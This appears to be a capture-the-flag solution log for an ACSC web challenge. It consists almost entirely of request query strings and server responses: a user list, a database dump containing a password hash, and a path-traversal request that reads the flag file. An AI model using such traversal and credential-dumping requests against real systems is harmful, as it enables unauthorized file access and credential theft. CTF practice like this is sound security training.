id=L3oo&pw=AAAAAAAAA&c=i&c2=gp
```
:<vNk
```

id=L3oo&pw=AAAAAAAAA&c=i&pas=:<vNk&c2=gu
```
["Pang","Check","Check2","Check3","Ahogehoge123","Msrkd","Aaaaaaaaaaaaaaaa","Xfuck2","Peterjson123","Haor","Testggwp123","Idealphase1","Ginoah","Test","Andjds","Admin","Administrator","Bromeat123","Daphuc1234","Ahihi123","Administratora","Dmctf","A1234","Dddd","A1qaz","Adminnnnnnn","Abc123","Premier123","Aaaa111","Testt","Taidh123taidh","Pang2","A123123","Abcabcabc","Pang3","Php4","Lorse","Dmctf1","Conkatzz","Aaa1234","Msrkds","Pang10","Administratora\n","Pang11","Pang12","Gasd","Pang123","Administrzaa","Administrzada","Ahihi123456","Aaaaa1234","Hiiiii","Taidh123taidh1","Adminn","Administrz\n","Administrzxx\n","Test12345","A09a","Administz","Aa123456","Lorse1","Aa12345678","N3mo","Tt123456","Xxx113","A03a","Af32","Admin99","Idealphase","Xxx11111","Mea123","Takuya","Dickman","Test1234gg","Adminiii","Aaaabb123","Meow12345","Damaro","A87878787","Done1","Admin1","Test1111","Ab0z","R0h1t","Aaaabb127","Aaaabb1278","Piriya12","Piriya12111","A03ab","A555555555","Ab0z2","Meow123456","Ab0z3","Ab0z4","Ab0z5","Ab0z6","Pang\n","Aaaabb1271","Asqrtrev","Adminnnnnnnn","A04341das","Ab0z7","Kam1tsur3","Tdmin","Ab0z8","Pangtest","Lmaomao1337","Aas3617123","A04341daa","A04341dab","Concacgithe","Mrperfect4599","Asdfhehe","A000","Kok1","Aaaaa12341111","A04341dab0x27","Aaaa","Concacgithe1","Hogehogehoge","Axd412","Uaaaa","Mugi","Cho1","Tester","Mzzzzz","Cho1\n","Cho2\n","A090","Cho4","Adeijjojs","Zafirr","Tienpa99dz","A1234asefef","Tienpa99dz1","A091","A092","Nhan","Msrk","Simia","Qwmn","True123123","Ssecret","Ugonfor","Omachi","Okas832","A123123123","A9090","Okkk","A093","Abcde","Astajima","Abcx2","Admin2502","Admin2503","Lys123","User","Opaa","Ssqa0f3umvs","Test1","A328","A3281","Admin12","Admin123","A3345","Save01","Xxxx","Tsecret1","Yuri","A12a","Aa12222222222222","Tienpa99dz1111","Msrkd12345","Aa12222222222223","Aa12222222222226","Admin22","Tsecret12","Huy123456","Save02","Hello1324","Aabca12345sasd5w","Wilcat","Ainsetin","Meowmeow","Aabca22345sasd5w","Uumm","Aalt","Aaaa1234","Aaaaaaaa1","Save03","Aaaaaaaa2","Skrrr1234","Baictfkhoqua","Aaaaaaaa6","Llama69","Lmaoezz123","Ayaxxxx12","Ayaxxxx13","Goodguy","Meowwww","Kaiziron","Snorlax123","P1ra","Aaaab","Amin1","Cro91qnnxmsaoiv","Idiot","Attack","Kt399syj6layalci","Idiot\n","Testacc","Zjfp2nyhdyd","Abstrsxht","Nyaos","Anpanman","Ganbatte","Phulelouch123","Admin1234","Abstrsxhx","Frostbolt","Nipun2","Anpanmangou","Aas1df","Nhan1","Naughtyraven1","Anpanmangou2","Zwekqwergpnwre","A12345","Zwekqwergpnwre\n","Zwekqwerg\n","Daniaodania0","H28359","H31483","Ahogetarou","Admin10","Zwqkmleg\n","Abcaaaaaadaa","Test111","Abalabbaaaa","Abcaaadaada","Aljnrwjfs","Adpckugdi","Arqfpatau","A41ndxm9o4f0u57","Aehqaciqy","Dcnl8vaes34","Aspcjgxcr","Ajdfkljadf","Bmwi","Syake","Acqlopxli","Acknuiket","Testa","Solve","Test11111","Douro","Americans","H1m69e9fc2ez0rah","Solver","Ndj1ffnjcbr0j5n","P3423e3","Test111111","Afdamxzts","Hoang","A125","A5unkn0wn11","Streakers","Streakers1","N1betesttest","A123","Test1234","Lmaoxd","Nopurposeinlife1","Peko","Nopurposeinlife","L3oo","Nopurpose"]
```

id=L3oo&pw=AAAAAAAAA&c=i&pas=:<vNk&c2=gd&db=user.db
```
[["Pang","c307cae832059f15e52cc5e6a26a2eb3ae7173e6","1"],...
```

id=L3oo&pw=AAAAAAAAA&c=i&pas=:<vNk&c2=gd&db=../../../../../../flag
```
[["ACSC{it_is_hard_to_name_a_flag..isn't_it?}\n"]]
```
```